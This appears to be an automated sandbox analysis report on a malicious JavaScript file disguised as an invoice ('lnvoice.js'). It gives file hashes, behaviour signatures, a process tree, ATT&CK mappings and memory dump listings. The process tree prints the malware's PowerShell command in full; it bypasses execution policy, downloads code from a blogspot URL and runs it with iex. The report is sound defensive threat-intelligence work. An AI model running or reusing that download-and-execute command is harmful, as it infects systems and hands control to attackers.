Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-05-2024 06:48

General

  • Target

    lnvoice.js

  • Size

    1.3MB

  • MD5

    65f9c67965df098ac25026ce6b229861

  • SHA1

    683649d54495bc1efa6dc22e3efab1c2ac3116fd

  • SHA256

    acb9edc3989f14d72f7994426388cc89f9e7a2167160b5cfa971fe0b78299288

  • SHA512

    bdcb1a1c24c5148b37b8a3e3ff96305d3637e8e39d9811ea507a8481c682080195d1b7e12b57e42d6572925d8164c1edfb491911dd28277bd37432961d05c0b8

  • SSDEEP

    384:AhSvcDV0ZbSpIM8yvPMGjYD9s4S6SVh+GjhmSPgEH0vO6/scXeDQX45vH58jcX52:AhSvWISpEhRLXriI

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\lnvoice.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm mainhotel5may.blogspot.com//////////////////////hehehehe) | . iex;Start-Sleep -Seconds 3;
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5892
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5344
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1244
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5428
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 780
          4⤵
          • Drops file in Windows directory
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:1216
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5516
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 760
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:1016
      • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5336
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 780
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:2908
      • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4440
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 780
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:2516

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

JavaScript

1
T1059.007

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pksgg4lz.sbi.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1244-63-0x0000000006F70000-0x0000000006F7A000-memory.dmp
    Filesize

    40KB

  • memory/1244-62-0x0000000006F10000-0x0000000006F60000-memory.dmp
    Filesize

    320KB

  • memory/1244-61-0x0000000006E10000-0x0000000006EAC000-memory.dmp
    Filesize

    624KB

  • memory/1244-60-0x0000000006540000-0x0000000006702000-memory.dmp
    Filesize

    1.8MB

  • memory/1244-41-0x0000000005610000-0x00000000056A2000-memory.dmp
    Filesize

    584KB

  • memory/1244-35-0x00000000054E0000-0x0000000005546000-memory.dmp
    Filesize

    408KB

  • memory/5344-23-0x0000000000400000-0x0000000000486000-memory.dmp
    Filesize

    536KB

  • memory/5344-39-0x0000000005930000-0x0000000005ED4000-memory.dmp
    Filesize

    5.6MB

  • memory/5344-29-0x0000000000D00000-0x0000000000D86000-memory.dmp
    Filesize

    536KB

  • memory/5892-14-0x00007FF990900000-0x00007FF9913C1000-memory.dmp
    Filesize

    10.8MB

  • memory/5892-0-0x00007FF990903000-0x00007FF990905000-memory.dmp
    Filesize

    8KB

  • memory/5892-21-0x0000028D228F0000-0x0000028D228F8000-memory.dmp
    Filesize

    32KB

  • memory/5892-22-0x0000028D23010000-0x0000028D23018000-memory.dmp
    Filesize

    32KB

  • memory/5892-19-0x0000028D228B0000-0x0000028D228BA000-memory.dmp
    Filesize

    40KB

  • memory/5892-30-0x00007FF990900000-0x00007FF9913C1000-memory.dmp
    Filesize

    10.8MB

  • memory/5892-18-0x0000028D228C0000-0x0000028D228DA000-memory.dmp
    Filesize

    104KB

  • memory/5892-17-0x0000028D22890000-0x0000028D2289E000-memory.dmp
    Filesize

    56KB

  • memory/5892-16-0x0000028D3B0D0000-0x0000028D3B2EC000-memory.dmp
    Filesize

    2.1MB

  • memory/5892-20-0x0000028D228E0000-0x0000028D228E8000-memory.dmp
    Filesize

    32KB

  • memory/5892-13-0x0000028D3BAE0000-0x0000028D3BCA2000-memory.dmp
    Filesize

    1.8MB

  • memory/5892-12-0x00007FF990900000-0x00007FF9913C1000-memory.dmp
    Filesize

    10.8MB

  • memory/5892-11-0x00007FF990900000-0x00007FF9913C1000-memory.dmp
    Filesize

    10.8MB

  • memory/5892-7-0x0000028D22FE0000-0x0000028D23002000-memory.dmp
    Filesize

    136KB

  • memory/5892-64-0x00007FF990903000-0x00007FF990905000-memory.dmp
    Filesize

    8KB

  • memory/5892-66-0x00007FF990900000-0x00007FF9913C1000-memory.dmp
    Filesize

    10.8MB

  • memory/5892-67-0x00007FF990900000-0x00007FF9913C1000-memory.dmp
    Filesize

    10.8MB